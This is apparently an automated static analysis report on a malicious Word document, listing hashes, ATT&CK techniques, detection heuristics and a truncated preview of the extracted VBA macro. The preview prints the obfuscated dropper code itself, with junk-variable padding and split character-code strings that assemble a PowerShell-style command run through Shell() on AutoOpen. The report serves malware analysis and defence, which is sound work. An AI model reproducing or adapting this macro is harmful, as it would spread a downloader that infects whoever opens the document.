Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dc037212c26afc36…

MALICIOUS

Office (OLE)

236.5 KB Created: 2018-06-27 18:42:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: e5b5e9d9804cfc6b84fd0c67ade8067a SHA-1: b1d6276ae6a7deb5631fd66dc49e4a83dde660cc SHA-256: dc037212c26afc3632e3a7dcec2ab7bf6d7b72d94bce9794142af1881788c0e5
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates a Shell() call within the VBA code, suggesting the execution of arbitrary commands. This is further supported by the 'Doc.Dropper.Agent-6593370-0' ClamAV detection. The AutoOpen macro is likely responsible for initiating this malicious behavior, aiming to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6593452-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593452-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10598 bytes
SHA-256: 317fbacc18cb215c6faefc51932112d096354232a741cb1990869a953543987c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "TjbNjVolhhY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LziizCwTzolC"
Function uSXbFmNPDbD()
On Error Resume Next
nZuUD = 62119
DUwupF = 11948
zIzuir = 18560
rHBEuT = oQMcOw
FoYoB = Sin(21501)
qoWjW = CDate(2752)
RcvpzKbTq = "Hell  -j" + "oin" + Chr(40) + " " + Chr(40) + " 2" + "5, 109," + "122" + ",114" + ", 0" + ",83,8" + "8 ,74,16"
TqJpk = 10595
zvDAa = CDate(74211)
oqHbs = 365
JltHEV = Sin(60333)
FSYks = 54993
aObtzK = EAksfw
wQCGNLUGqGS = ",82 , " + "95, 87" + " , " + "88, 94 " + ", " + "73 " + ",29 ,11" + "5,88 "
moqENi = 99619
wcKdu = CDate(74418)
rkbbb = 28324
tnPKJk = Sin(60712)
LXrZTQ = 61266
NsFsV = CJEhDu
pAstfRJwmVc = ", 73 , " + "19,106 " + ",88, 95" + ", 126," + "81" + " ,84 , 8" + "8 , 83 "
TXravD = 30291
upNSD = CDate(10616)
tkiLW = 54348
pkfdKd = Sin(89730)
RlzZYX = 4290
lPHpqB = ZEQTPQ
SwhMTpPwBV = ", " + "73,6" + ",25, 1" + "12" + ",74 ," + " 110, 0" + " ,26, " + "85, " + "73" + ",73, 77 " + ",7 , 1" + "8,18 "
bWiAi = 14143
zqiJQ = CDate(87509)
jnmGp = 96824
CpWYT = Sin(88327)
kWIJuL = 48028
jhnfUi = QRddw
krLJj = ",74 ," + "74 ," + " 74 , 19" + ",78 ,92" + ", 80,79 " + ", 92" + " ,73 ," + " 84 ,8" + "3 " + ", 8" + "9, 84 ,9"
XjpEqj = 77177
Lsuin = CDate(47511)
cGFiU = 60059
UqVsh = Sin(33173)
wbjioG = 96784
cLfZLN = ikIFn
aazjUmB = "2,8" + "3,19 ," + " 94,82," + "80 , 19" + ", 92 " + ",72 ," + "18," + "71, 1" + "16 ,85, "
uAKGP = 91090
rjcLfu = CDate(16913)
JunNFz = 30159
XirCwk = Sin(31899)
NkmsRk = 64242
jZVBwo = fzlFP
SZjorZGv = "113 " + ", 71, " + "71 ,18 " + ",125 ,85" + " ,73,7" + "3 ," + "77" + " ," + " 7" + " ,1"
XYCzNz = 1406
YXPObQ = CDate(65518)
OMDZd = 75596
UshhR = Sin(49574)
VUEQS = 53945
fjWoi = hETza
wXDzNZFbMv = "8," + "18 , 74," + "74 ," + " 74 , 1" + "9,8" + "4, " + "83 , 16" + ", 80 ,92" + ",90, 92"
XrfUF = 27363
LrzCb = CDate(92049)
oWmhAV = 79756
kwWwJ = Sin(44463)
oKCWnT = 94549
VcWab = zbQDMY
sYjczDN = " ,7" + "1 ,8" + "4 ," + "83, 88" + ", 19 , " + "92 , " + "78 ," + "73,1"
KOstNA = 10292
npmrn = CDate(18950)
FqcfRR = 51083
uFwHmi = Sin(74452)
CTNtpz = 75191
UjYWhS = DoLAO
XGXwAlClDR = "6,94,8" + "2,80, 19" + ",7" + "9, 72, 1" + "8 ,71, " + "114 " + ",89, 81" + " ,"
bhRFYP = 27068
iMWMKw = CDate(39400)
HubDF = 84832
uONjK = Sin(25526)
iiCscm = 23334
jiHRQK = rSjatF
ujHNw = "9,90, 12" + "3, 91 " + ",6" + "8 ," + " 84, 18" + " ,12" + "5, 85 " + ", 73 ," + "73 , 77," + " 7"
uSXbFmNPDbD = RcvpzKbTq + wQCGNLUGqGS + pAstfRJwmVc + SwhMTpPwBV + krLJj + aazjUmB + SZjorZGv + wXDzNZFbMv + sYjczDN + XGXwAlClDR + ujHNw
NQlXZ = 45708
tDKqJ = CDate(62906)
SMNvq = 59071
ocqOm = Sin(99435)
Ohshd = 19914
UKVTEv = YoYQU
End Function
Function ThwpO()
On Error Resume Next
nintd = 92656
Zzhrrz = CDate(11454)
QwzKi = 39600
bzFnzO = Sin(61050)
YJDFh = 96164
BCqhvI = nRoqt
wUVWdfftp = ", 18 , 1" + "8,78 , 8" + "4 ,73,8" + "8, 78" + " , 19," + " 95 , 8" + "1,72 " + ", 88"
VzPIJr = 69705
aMvaOh = CDate(88339)
qfrcW = 95845
pfjPb = Sin(46212)
ndISXh = 10090
PJnTrz = zzSooM
KKQSoQVptr = ", 7" + "8, 86" + ", " + "68,89 ,8" + "4, 90,84" + ", 73," + " 92" + ",81 , 1" + "9 , "
LRYVJ = 68147
wPcav = CDate(20409)
nEZkc = 99832
zBzMv = Sin(67102)
fjwjv = 87124
hUmAc = iAUSjh
BKZQIAj = "94," + " 8" + "2,80" + " , 1" + "9, 92" + " ,72 " + ", 18,1" + "24 ," + "69 , 7" + "3 ,101" + " ,105 ,"
LbIiAl = 71928
mEmzq = CDate(49068)
zUGkwk = 78402
AvHTrI = Sin(21632)
wJhpJU = 9087
snsJi = BYDFjb
iwHwXOpRkq = "11" + "2, 9 ,18" + " , 125 " + ", 85 ," + " 73 ,73" + ",77 , 7" + " ,18 " + ",18, " + "74,74 " + ",74" + " , 1" + "9, 8"
MjPLG = 4398
FWaNhI = CDate(35207)
KbHpq = 18475
FuIzl = Sin(5253)
zuzrwX = 78042
BBwQvi = UVQwk
iWafwzkE = "7 , " + "89,78" + " , " + "88 ," + " 7" + "9 ,75, 8" + "4 , 94"
WAFXKl = 53406
UnAVCl = CDate(2199)
bIwzz = 32653
aqs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.